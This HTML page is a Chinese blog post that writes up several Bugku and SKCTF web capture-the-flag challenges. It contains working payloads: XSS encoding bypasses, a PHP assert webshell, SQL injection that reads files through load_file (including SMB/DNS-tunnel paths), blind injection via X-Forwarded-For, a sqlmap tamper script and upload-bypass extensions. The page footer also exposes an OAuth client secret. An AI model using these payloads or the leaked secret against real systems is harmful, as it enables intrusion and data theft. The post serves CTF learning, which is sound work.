<!DOCTYPE html>
<html lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
        <meta http-equiv="content-type" content="text/html; charset=utf-8">
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
    <title>
        
            CTF中的Web题目
        
    </title>
    <link rel="icon" href="/img/favicon.png">
    <link rel="stylesheet" href="/css/style.css">
    <link rel="stylesheet" href="/css/font-awesome.min.css">
    <link rel="stylesheet" href="/css/gitment.css">
    <link rel="stylesheet" href="/css/hljs.min.css">
    <script src="/js/hljs.min.js"></script>  
    <script src="/js/gitment.browser.js"></script>  
</head>
<body>
    <header class="header" id="header">
    <h1>
        <a class="title" href="/">
            Hpdoger
        </a>
    </h1>
    <h2>
        <a class="motto">
            Finance behind Passion in Security
        </a>
    </h2>
    <nav class="navbar">
        <ul class="menu">
            
            
                <li class="menu-item">
                    <a href="/" class="menu-item-link">
                        Home
                    </a>
                </li>
            
                
            
                <li class="menu-item">
                    <a href="/archives/" class="menu-item-link">
                        Archives
                    </a>
                </li>
            
                
            
                <li class="menu-item">
                    <a href="/about/" class="menu-item-link">
                        About
                    </a>
                </li>
            
                
            
                <li class="menu-item">
                    <a href="/friends/" class="menu-item-link">
                        Friends
                    </a>
                </li>
            
                
            
                <li class="menu-item">
                    <a href="https://github.com/Hpd0ger" class="menu-item-link">
                        Github
                    </a>
                </li>
            
                
            
                <li class="menu-item">
                    <a href="/atom.xml" class="menu-item-link">
                        RSS
                    </a>
                </li>
            
                
            
                
                
                <li class="menu-item">
                    <a class="menu-item-link search">
                        Search                   
                        <i class="fa fa-long-arrow-right search-icon" aria-hidden="true"></i>
                    </a>
                        <input placeholder="Search..." class="search-input" style="display:none;border:none!important;" onkeydown="onEnter(event)" onkeypress="onEnter(event)">
                </li>
                
        </ul>
    </nav>
</header>
    <main class="main">
        <article class="post">
            <h1>
                <a class="title" href="/2018/06/06/Web题目/"> 
                    CTF中的Web题目 
                </a>
            </h1>
            <div class="meta">
                <a class="date"> 
                    <i class="fa fa-calendar" aria-hidden="true"></i>                    
                    2018-06-06   
                </a>
                
                <a class="category">
                    <i class="fa fa-th" aria-hidden="true"></i>  
                </a>
               
                <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a></li></ul>
                
                <a class="tag">
                    <i class="fa fa-tags" aria-hidden="true"></i>  
                </a>
                
                    <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf，web/">ctf，web</a></li></ul>
            </div>
<div class="toc">
  <ol class="toc-list"><li class="toc-list-item toc-list-level-1"><a class="toc-list-link" href="#CTF中的web题目"><span class="toc-list-text">CTF中的web题目</span></a><ol class="toc-list-child"><li class="toc-list-item toc-list-level-2"><a class="toc-list-link" href="#Bugku"><span class="toc-list-text">Bugku</span></a><ol class="toc-list-child"><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#矛盾"><span class="toc-list-text">矛盾</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#变量1"><span class="toc-list-text">变量1</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#xss攻击"><span class="toc-list-text">xss攻击</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#Web4"><span class="toc-list-text">Web4</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#备份是个好习惯"><span class="toc-list-text">备份是个好习惯</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#never-give-up"><span class="toc-list-text">never give up</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#过狗一句话"><span class="toc-list-text">过狗一句话</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#前女友"><span class="toc-list-text">前女友</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#login1-SKCTF"><span class="toc-list-text">login1(SKCTF)</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#web8"><span class="toc-list-text">web8</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#求getshell"><span class="toc-list-text">求getshell</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#sql注入2"><span class="toc-list-text">sql注入2</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#报错注入"><span class="toc-list-text">报错注入</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#insert-into注入"><span class="toc-list-text">insert into注入</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#多次"><span class="toc-list-text">多次</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#login3-SKCTF"><span class="toc-list-text">login3{SKCTF}</span></a></li></ol></li></ol></li></ol>
</div>
            <div class="content">
                <h1 id="CTF中的web题目"><a href="#CTF中的web题目" class="headerlink" title="CTF中的web题目"></a>CTF中的web题目</h1><hr>
<h2 id="Bugku"><a href="#Bugku" class="headerlink" title="Bugku"></a>Bugku</h2><h3 id="矛盾"><a href="#矛盾" class="headerlink" title="矛盾"></a>矛盾</h3><p><img src="https://s1.ax1x.com/2018/06/17/CvjhN9.png" alt="tupian"><br>!is_numeric($num): 判断输入不是数字或数字字符串<br>还要让输入的值==1,我们就构造字符串，num=1a，等号判断时，会取字符串第一个值进行比较</p>
<h3 id="变量1"><a href="#变量1" class="headerlink" title="变量1"></a>变量1</h3><p><img src="https://s1.ax1x.com/2018/06/17/CvxWWR.png" alt="bianliang"><br>preg_match进行正则匹配，\w+匹配一或多个字符数字下划线，后面dump的变量是可变变量，所以可以借机把我们想要的变量打印出来，一开始我构造args=flag，并无卵用。返回NULL，说明不存在flag这个变量，那我们就把所有的变量都打印出来。</p>
<p>这里用到超全局变量GLOBAL,构造args=GLOBAL,打印出来所有变量即可</p>
<h3 id="xss攻击"><a href="#xss攻击" class="headerlink" title="xss攻击"></a>xss攻击</h3><p>研究了一天的xss，并没有什么实际的进展。这道xss是用htmlspecialchars()函数将&lt;、&gt;进行html实体化，让浏览器在html编码解析时，发现它是实体化的编码，就把他们解码为普通的可视化的&lt;、&gt;。这里我们看源码知道这是utf-8的编码方式，我们如果用unicode的方式编码&lt;，后端不识别这个unicode为&lt;，但html解析之后，unicode又变回&lt;，js解析器解析完script标签之后，触发Js引擎执行这段js代码。所以我们构造playload:</p>
<pre><code>\u003cscript\u003ealert(_key_)\u003c/script\u003e</code></pre><p>\u开头好像表示的是Utf-8的unicode编码形式（瞎猜的），好菜啊。。这个并没有完全搞懂。<br>google了半天的浏览器渲染，明白了这个道理：一旦html解析到script标签的时候，就会启动js解析器来解析标签里面的东西，js解析完了之后就执行里面的Js语句。html继而再向后进行解析。</p>
<p>贴几个介绍编码绕过xss的文章：<br><a href="https://blog.csdn.net/xiaozhuxmen/article/details/52014901" target="_blank" rel="noopener">浏览器加载、解析、渲染的过程</a><br><a href="https://www.cnblogs.com/flycat-2016/p/6507543.html" target="_blank" rel="noopener">xss编码与绕过</a><br><a href="http://www.freebuf.com/articles/web/43285.html" target="_blank" rel="noopener">xss编码剖析</a><br><a href="https://unicode-table.com/en/#control-character" target="_blank" rel="noopener">字符转unicode</a></p>
<h3 id="Web4"><a href="#Web4" class="headerlink" title="Web4"></a>Web4</h3><p>提示让我们看源码，发现有一串url编码的东西，<br>解码后传值就行了，拼接两个escape的值</p>
<h3 id="备份是个好习惯"><a href="#备份是个好习惯" class="headerlink" title="备份是个好习惯"></a>备份是个好习惯</h3><p>备份文件泄露，php代码泄露检测工具<a href="https://coding.net/u/yihangwang/p/SourceLeakHacker/git?public=true" target="_blank" rel="noopener">SourceLeakHacker</a></p>
<h3 id="never-give-up"><a href="#never-give-up" class="headerlink" title="never give up"></a>never give up</h3><p>查看源码有一个1p.html页面，访问之后出现一堆base64编码的内容，解码后是页面源码，费劲心思构造b，没想到最后直接访问f4l2a3g.txt就可以…</p>
<h3 id="过狗一句话"><a href="#过狗一句话" class="headerlink" title="过狗一句话"></a>过狗一句话</h3><p>题目给出你了源码</p>
<pre><code>&lt;?php 
$poc=&quot;a#s#s#e#r#t&quot;; 
$poc_1=explode(&quot;#&quot;,$poc);
$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; 
$poc_2($_GET[&#39;s&#39;]) 
?&gt;</code></pre><p>也就是说会执行一个(assert函数)[<a href="http://www.php.net/manual/zh/function.assert.php]" target="_blank" rel="noopener">http://www.php.net/manual/zh/function.assert.php]</a><br>所以我们只需要给s赋值为我们想要执行的语句。<br>看到别人的Wp,应该是先扫描一下当前目录看有什么东西<br>payload:</p>
<pre><code>s = print_r(scandir(&#39;./&#39;))</code></pre><p>这里我们用print_r来打印数组相关信息，而不是print。<br>关于绝对路径的用法：</p>
<ol>
<li>./  当前目录</li>
<li>../ 上层目录</li>
<li>../../  上2层目录</li>
</ol>
<h3 id="前女友"><a href="#前女友" class="headerlink" title="前女友"></a>前女友</h3><p>这个跟实验吧php是最好的语言有点类似。<br>打开它提示的链接，然后代码审计。<br>md5可以用数组绕过，也可以用0e开头的md5值绕过。<br>Strcmp可以用数组绕过。<br>我的payload:</p>
<pre><code>?v1=s878926199a&amp;v2=s155964671a&amp;v3[]=1</code></pre><p>po一个php函数漏洞的总结<a href="https://blog.csdn.net/qq_31481187/article/details/60968595" target="_blank" rel="noopener">链接</a></p>
<h3 id="login1-SKCTF"><a href="#login1-SKCTF" class="headerlink" title="login1(SKCTF)"></a>login1(SKCTF)</h3><p>hint:sql约束攻击<br>去百度了一下什么叫<a href="https://blog.csdn.net/qq_32400847/article/details/54137747" target="_blank" rel="noopener">约束攻击</a><br>约束的意思就是对长度进行约束，看完上面的链接基本上就知道注册时的用户名怎么构造了。<br>我的构造:<br><code>admin                                     （前方为空格）</code></p>
<h3 id="web8"><a href="#web8" class="headerlink" title="web8"></a>web8</h3><p>这个题有点意思，涉及到extract()变量覆盖，看一下给的源代码:</p>
<pre><code>&lt;?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo &quot;&lt;p&gt;This is flag:&quot; .&quot; $flag&lt;/p&gt;&quot;;
}
else
{
echo &quot;&lt;p&gt;sorry!&lt;/p&gt;&quot;;
}
}
?&gt;</code></pre><ul>
<li><p>首先了解一下empty函数<br>这个函数一开始把我误导了，empty是用来测试变量是否已经配置。若变量已存在、非空字符串或者非零，则返回 false 值，反之返回ture。</p>
</li>
<li><p>再介绍一下extract函数：<br>extract() 函数从数组中将变量导入到当前的符号表。<br>该函数使用数组键名作为变量名，使用数组键值作为变量值。针对数组中的每个元素，将在当前符号表中创建对应的一个变量。</p>
</li>
</ul>
<p>题目提示有txt文件，我们访问一下flag.txt，发现内容是：flags。<br>我们要传入一个非空的ac,让它的值===$f，$f来自于读取文件获得里面的字符串，文件名叫$fn。目前我们不知道$fn指向哪个文件，但是我们知道有flag.txt这个文件。所以我们让$ac=flags并且$fn=flag.txt就行了<br>payload:</p>
<pre><code>?$ac=flags&amp;$fn=flag.txt</code></pre><h3 id="求getshell"><a href="#求getshell" class="headerlink" title="求getshell"></a>求getshell</h3><p>这是一个上传绕过题目，后缀很名单检测和类型检测<br>php别名php2, php3, php4, php5, phps, pht, phtm, phtml<br>发现php5可以绕过，还要更改 Content-Type里，把multipart改成大写（搞不懂问什么）。<br>贴一个上传绕过总结的[链接]（<a href="https://thief.one/2016/09/22/%E4%B8%8A%E4%BC%A0%E6%9C%A8%E9%A9%AC%E5%A7%BF%E5%8A%BF%E6%B1%87%E6%80%BB-%E6%AC%A2%E8%BF%8E%E8%A1%A5%E5%85%85/）" target="_blank" rel="noopener">https://thief.one/2016/09/22/%E4%B8%8A%E4%BC%A0%E6%9C%A8%E9%A9%AC%E5%A7%BF%E5%8A%BF%E6%B1%87%E6%80%BB-%E6%AC%A2%E8%BF%8E%E8%A1%A5%E5%85%85/）</a></p>
<p>上传文件时waf会检查哪里？<br>请求的url<br>Boundary边界<br>MIME类型<br>文件扩展名<br>文件内容</p>
<p>常见扩展名黑名单：<br>asp|asa|cer|cdx|aspx|ashx|ascx|asax<br>php|php2|php3|php4|php5|asis|htaccess<br>htm|html|shtml|pwml|phtml|phtm|js|jsp<br>vbs|asis|sh|reg|cgi|exe|dll|com|bat|pl|cfc|cfm|ini</p>
<h3 id="sql注入2"><a href="#sql注入2" class="headerlink" title="sql注入2"></a>sql注入2</h3><p>写着sql注入的名字，看到网上说竟然是DS_Store源码泄露？？exm？？？最后直接访问<a href="http://120.24.86.145:8007/web2/flag，就可以下载到flag" target="_blank" rel="noopener">http://120.24.86.145:8007/web2/flag，就可以下载到flag</a></p>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><p><a href="http://103.238.227.13:10088/" target="_blank" rel="noopener">题目链接</a><br>既然提示了报错注入，我们就按照提示来注入，我使用的是updatexml报错函数，测试一下：<br><img src="https://s1.ax1x.com/2018/06/06/C7bVXV.png" alt="ceshi"><br>可以看到，爆出了库名，说明这个方法可行。题目给了提示让我们读文件内容，要用到load_file函数，先看一下函数的几种用法举例：</p>
<pre><code>select load_file(&#39;c:/boot.ini&#39;)
select load_file(0x633a2f626f6f742e696e69)
select load_file(&#39;//ecma.io/1.txt&#39;) # smb协议
select load_file(&#39;\\\\ecma.io\\1.txt&#39;) # 可用于DNS隧道</code></pre><p>我们的思路是把concat里面查询数据库的句子替换为substr（返回值函数），不让报错函数打印数据库的名字了，而是打印我们读到的文件内容，substr就相当于printf的作用。题目过滤了单引号，我们就用十六进制表示绝对路径，但是要用到hex()函数让数据库知道我们要将字符串转为16进制。值得注意的是concat语句第一个空不可省略，否则打印不出内容。完整的payload:</p>
<pre><code>http://103.238.227.13:10088/?id=1%0aor%0aupdatexml(1,concat(0x7e,substr(hex(load_file(0x2f7661722f746573742f6b65795f312e706870)),1,30)),1)</code></pre><p>先返回读到内容前30位的16进制，再更改语句依次往后读：</p>
<pre><code>http://103.238.227.13:10088/?id=1%0aor%0aupdatexml(1,concat(0x7e,substr(hex(load_file(0x2f7661722f746573742f6b65795f312e706870)),31,30)),1)</code></pre><p><img src="https://s1.ax1x.com/2018/06/06/C7bm0U.png" alt="tupian"><br>将读到的16进制转换为字符：<br><img src="https://s1.ax1x.com/2018/06/06/C7bemT.png" alt="jieguo"></p>
<h3 id="insert-into注入"><a href="#insert-into注入" class="headerlink" title="insert into注入"></a>insert into注入</h3><p>先审计一下源码：</p>
<pre><code>error_reporting(0);

function getIp(){
$ip = &#39;&#39;;
if(isset($_SERVER[&#39;HTTP_X_FORWARDED_FOR&#39;])){
$ip = $_SERVER[&#39;HTTP_X_FORWARDED_FOR&#39;];
}else{
$ip = $_SERVER[&#39;REMOTE_ADDR&#39;];
}
$ip_arr = explode(&#39;,&#39;, $ip);
return $ip_arr[0];

}

$host=&quot;localhost&quot;;
$user=&quot;&quot;;
$pass=&quot;&quot;;
$db=&quot;&quot;;

$connect = mysql_connect($host, $user, $pass) or die(&quot;Unable to connect&quot;);

mysql_select_db($db) or die(&quot;Unable to select database&quot;);

$ip = getIp();
echo &#39;your ip is :&#39;.$ip;
$sql=&quot;insert into client_ip (ip) values (&#39;$ip&#39;)&quot;;
mysql_query($sql);</code></pre><p>explode过滤逗号，所以报错注入肯定行不通。看到网上的Wp说是基于时间的盲注，盲注点很显然是XFF。经过测试payload有效：</p>
<pre><code>X-Forwarded-For:1&#39;+sleep(5) and &#39;1&#39;=&#39;1</code></pre><p>页面返回有一个延时，这里就不能用if(,,)语句了，因为过滤了逗号，用另一个注入语句:</p>
<pre><code>select case when (条件) then 代码1 else 代码 2 end</code></pre><p>于是有了如下的payload：</p>
<pre><code>1&#39; and (select case when (select length(flag) from flag limit 1)=32 then sleep(5) else 1 end) and &#39;1&#39;=&#39;1</code></pre><p>emmm,手注是不可能的，这辈子是不可能手注的（手动滑稽），我们抓个包让sqlmap以XFF为注入点扫描，再加个过滤逗号的tamper就好了。若以XFF为注入点，则要在抓包后的导出文件里XFF后加*，标识为注入点如图：<br><img src="https://s1.ax1x.com/2018/06/06/CHe1Cd.png" alt="zhurudian"><br>然后找了网上大神的过滤逗号的tamper，放在Sqlmap目录里，命名为comamalessmysql.py</p>
<pre><code>#!/usr/bin/env python

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    &quot;&quot;&quot;
    Replaces some instances with something whthout comma 

    Requirement:
        * MySQL

    Tested against:
        * MySQL 5.0


    &gt;&gt;&gt; tamper(&#39;ISNULL(TIMESTAMPADD(MINUTE,7061,NULL))&#39;)
    &#39;ISNULL(NULL)&#39;

    &gt;&gt;&gt; tamper(&#39;MID(VERSION(), 2, 1)&#39;)
    &#39;MID(VERSION() FROM 2 FOR 1)&#39;

    &gt;&gt;&gt; tamper(&#39;IF(26=26,0,5)&#39;)
    &#39;CASE WHEN 26=26 THEN 0 ELSE 5 END&#39;

    &gt;&gt;&gt; tamper(&#39;IFNULL(NULL,0x20)&#39;)
    &#39;CASE WHEN NULL=NULL THEN 0x20 ELSE NULL END&#39;

    &gt;&gt;&gt; tamper(&#39;LIMIT 2, 3&#39;)
    &#39;LIMIT 3 OFFSET 2&#39;
    &quot;&quot;&quot;


    def commalessif(payload):
        if payload and payload.find(&quot;IF&quot;) &gt; -1:
            while payload.find(&quot;IF(&quot;) &gt; -1:
                index = payload.find(&quot;IF(&quot;)
                depth = 1
                comma1, comma2, end = None, None, None

                for i in xrange(index + len(&quot;IF(&quot;), len(payload)):
                    if depth == 1 and payload[i] == &#39;,&#39; and not comma1:
                        comma1 = i

                    elif depth == 1 and payload[i] == &#39;,&#39; and comma1:
                        comma2 = i

                    elif depth == 1 and payload[i] == &#39;)&#39;:
                        end = i
                        break

                    elif payload[i] == &#39;(&#39;:
                        depth += 1

                    elif payload[i] == &#39;)&#39;:
                        depth -= 1

                if comma1 and comma2 and end:
                    _ = payload[index + len(&quot;IF(&quot;):comma1]
                    __ = payload[comma1 + 1:comma2]
                    ___ = payload[comma2 + 1:end]
                    newVal = &quot;CASE WHEN %s THEN %s ELSE %s END&quot; % (_, __, ___)
                    payload = payload[:index] + newVal + payload[end + 1:]
                else:
                    break

        return payload

    def commalessifnull(payload):
        if payload and payload.find(&quot;IFNULL&quot;) &gt; -1:
            while payload.find(&quot;IFNULL(&quot;) &gt; -1:
                index = payload.find(&quot;IFNULL(&quot;)
                depth = 1
                comma, end = None, None

                for i in xrange(index + len(&quot;IFNULL(&quot;), len(payload)):
                    if depth == 1 and payload[i] == &#39;,&#39;:
                        comma = i

                    elif depth == 1 and payload[i] == &#39;)&#39;:
                        end = i
                        break

                    elif payload[i] == &#39;(&#39;:
                        depth += 1

                    elif payload[i] == &#39;)&#39;:
                        depth -= 1

                if comma and end:
                    _ = payload[index + len(&quot;IFNULL(&quot;):comma]
                    __ = payload[comma + 1:end].lstrip()
                    newVal = &quot;CASE WHEN %s=NULL THEN %s ELSE %s END&quot; % (_, __, _)
                    payload = payload[:index] + newVal + payload[end + 1:]
                else:
                    break

        return payload

    retVal = payload

    if payload:
        retVal = re.sub(r&#39;(?i)TIMESTAMPADD\(\w+,\d+,NULL\)&#39;, &#39;NULL&#39;, retVal)
        retVal = re.sub(r&#39;(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)&#39;, &#39;MID(\g&lt;1&gt; FROM \g&lt;2&gt; FOR \g&lt;3&gt;)&#39;, retVal)
        retVal = commalessif(retVal)
        retVal = commalessifnull(retVal)
        retVal = re.sub(r&#39;(?i)LIMIT\s*(\d+),\s*(\d+)&#39;, &#39;LIMIT \g&lt;2&gt; OFFSET \g&lt;1&gt;&#39;, retVal)

    return retVal
</code></pre><p>然后Sqlmap里跑一下，语句如下:<br><img src="https://s1.ax1x.com/2018/06/07/CHlWOs.jpg" alt="sqlmap"></p>
<h3 id="多次"><a href="#多次" class="headerlink" title="多次"></a>多次</h3><p>这道题困了我一天，一开始我以为是盲注，于是花时间在写脚本花了一天。。后来找到一个wp其实就是手注，只是过滤掉了union一些关键词，看一下题目：</p>
<ul>
<li>查询有结果时，返回nothing</li>
<li>查询无结果时，返回error</li>
<li>%23可注释，引号可用</li>
</ul>
<p>ok，知道上述条件，我们测一下它过滤了什么。<br>介绍一种检查过滤的方法，叫异或判断：<br>异或是一种逻辑运算，运算法则简言之就是：两个条件相同（同真或同假）即为假（0），两个条件不同即为真（1），null与任何条件做异或运算都为null，如果从数学的角度理解就是，空集与任何集合的交集都为空。ysql里异或运算符为^ 或者 xor</p>
<ol>
<li>构造id=1’^(条件)^’</li>
<li>判断的两个条件一个是括号里的条件，另一个是后面的’’，’’为空，即为0。所以括号里的条件若是成立，则页面返回错误；反之则页面返回正常</li>
<li>完整payload:<pre><code>http://120.24.86.145:9004/1ndex.php?id=1&#39;^(length(&#39;union&#39;)=5)^&#39;</code></pre>返回正确，说明判断条件是错的，所以union被过滤了<br>我们用叠加语句看一下 uniunionon是否会被过滤，payload:<pre><code>http://120.24.86.145:9004/1ndex.php?id=1&#39;^(length(&#39;uniunionon&#39;)=5)^&#39;</code></pre>返回错误，说明判断条件正确，所以这个可以当作union使用。</li>
<li>接下来就是一些基础查询了，题目说有两个flag，再查到另一个列时，出现一个网址：<br>Once_More.php</li>
<li>里面还有一道注入题，因为它会回显你提交的参数，所以想知道过滤了什么直接就可以看出来，过滤了Union，我用的报错注入解决的</li>
<li>over，这道题学习了异或注入判断过滤。</li>
</ol>
<h3 id="login3-SKCTF"><a href="#login3-SKCTF" class="headerlink" title="login3{SKCTF}"></a>login3{SKCTF}</h3><p>tip给了说是布尔盲注<br>在username这个注入点测试一下，初步手工模糊测试，发现过滤了空格、逗号、等号，没有过滤#和’。因为是布尔盲注，那我们构造ascii函数语句。首先我们猜测一个用户名吧,就猜Admin,发现回显是：password error。<br>这说明这个用户名存在，那么我们就可以把这句话作为一个判断对错的语句，结合异或注入进行ascii的猜测。（用户名错误时会返回 username does not exist!）</p>
<ol>
<li>过滤了‘=’，那么我们ascii的等号语句就没法使用了，经过测试like是绕不过去的。那我们就通过这句话替换掉等号：<pre><code>username=admin&#39;^(ascii(&#39;a&#39;)-97)</code></pre>等价于：<pre><code>username=admin&#39;^(0)</code></pre>异或注入，因为a的十进制ascii为97，所以与（0）异或。</li>
</ol>
<ul>
<li>（0）条件时返回”password error”</li>
<li>其余条件时返回”username does not exist!”</li>
</ul>
<ol start="2">
<li>直接上py脚本跑：<br><img src="https://s1.ax1x.com/2018/06/11/CLls8f.png" alt="jiaoben"><br>这里需要解释一下，既然过滤了逗号，那么我们substr（,,）的语句就没用了。我们可以换一种形式表达，即substr(database()from1)，这样的返回值如图：<br><img src="https://s1.ax1x.com/2018/06/11/CLl0UI.png" alt="substr1"><br><img src="https://s1.ax1x.com/2018/06/11/CLlB5t.png" alt="substr2"><br>所以问题就来了，ascii函数对字符串的返回值是什么呢? 这个问题想了我好久，一开始是找的别人的脚本，看他们写遍历的时候卡在这个地方，这尼玛的ascii面对字符串难道不是返回NULL？！。后来发现自己惯性思维了，测试一下，ascii()这个破函数在处理字符串的时候会返回字符串第一个字符的ascii值，难受ing…</li>
</ol>
<p>还有一个问题就是过滤掉了information，这让查表就变的头疼。<br>但是我们想一下php后端处理过程，它对username的处理无非是下边框架的语句：<br>select username from 表 where username = “admin”^()<br>所以它为我们已经找好了表了，既然题把information锁死了，那flag就只可能是这个admin的密码了。那我们要做的就是查admin密码</p>
<p>看一下下面这个语句：<br><img src="https://s1.ax1x.com/2018/06/11/CLlNKe.png" alt="password"></p>
<p>我们的密码猜对时，返回false，跟上面异或的思路一样</p>

            </div>
          
           
            <div class="copyright">
                <div class="name">
                    <a>Author:</a>
                    <a>Hpdoger</a>
                </div>
                <div class="link">
                    <a>Link:</a>
                    <a class="permalink" href="https://hpdoger.cn/2018/06/06/Web题目/">https://hpdoger.cn/2018/06/06/Web题目/</a>
                </div>
                <div class="license">
                    <a>Statement:</a>
                    <a>All articles in this blog shall be licensed by CC BY-NC-SA 3.0 CN, unless otherwise stated. Please indicate the provenance!</a>
                </div>
            </div>
            

          


</article>


<div class="tip">
<button class="tip-btn">
    Tip
</button>
<div class="tip-img">
<ul>
    
 
<li>
    <img src="/img/wechat.jpg">
</li>

</ul>
</div>
</div>

<div class="more">

    <div class="prev">
   <a href="/2018/06/20/一道SCTF写日志getshell/">  记SCTF的一道mysql日志写Shell题目</a>
    </div>

<div></div>

    <div class="next">
    <a href="/2018/06/06/WhaleCTF的Web题目/"> WhaleCTF的Web题目 </a>
    </div>
    
</div>

<div class="bdsharebuttonbox">
<a href="#" class="bds_weixin fa fa-weixin" data-cmd="weixin" title="分享到微信" style="color:#1cbd8f">
</a>
<a href="#" class="bds_tsina fa fa-weibo" data-cmd="tsina" title="分享到新浪微博" style="color:#ff6363">
</a>
<a href="#" class="bds_twi fa fa-twitter" data-cmd="twi" title="分享到Twitter" style="color:#00A7EB">
</a>
<a href="#" class="bds_fbook fa fa-facebook" data-cmd="fbook" title="分享到Facebook" style="color:#00A7EB">
</a>
</div>
<script>
window._bd_share_config={
    "common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"1","bdSize":"16"},
    "share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='../../../../../static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
</script>
 
<div id="comments"></div>

<script>
    var gitment = new Gitment({
    id: "Wed Jun 06 2018 12:25:35 GMT+0800",
    owner: "Hpd0ger",
    repo: "Hpd0ger.github.io",
    oauth: {
      client_id:"8d83609a651e972e308d",
      client_secret: "37e40c89a47e957f654e86f71c5caaccad0774de",
    }
  })
  gitment.render('comments')
</script>
    </main>
    <a class="not-found">not found!</a>
    <div class="search-items">
    </div>
    <a href="#header" id="top" style="display:none">
        <i class="fa fa-sort-asc fa-2x"></i>
    </a>
    <footer class="footer">
    <div class="footer-copyright">©️2017
    <a href="//github.com/Vevlins/toki" class="link" target="_blank">Toki</a>  by Vevlins
    </div>
</footer>

    <script src="/js/jquery.js"></script>
    <script src="/js/toki.js"></script>  
  <script>hljs.initHighlightingOnLoad();</script>
</body>
</html>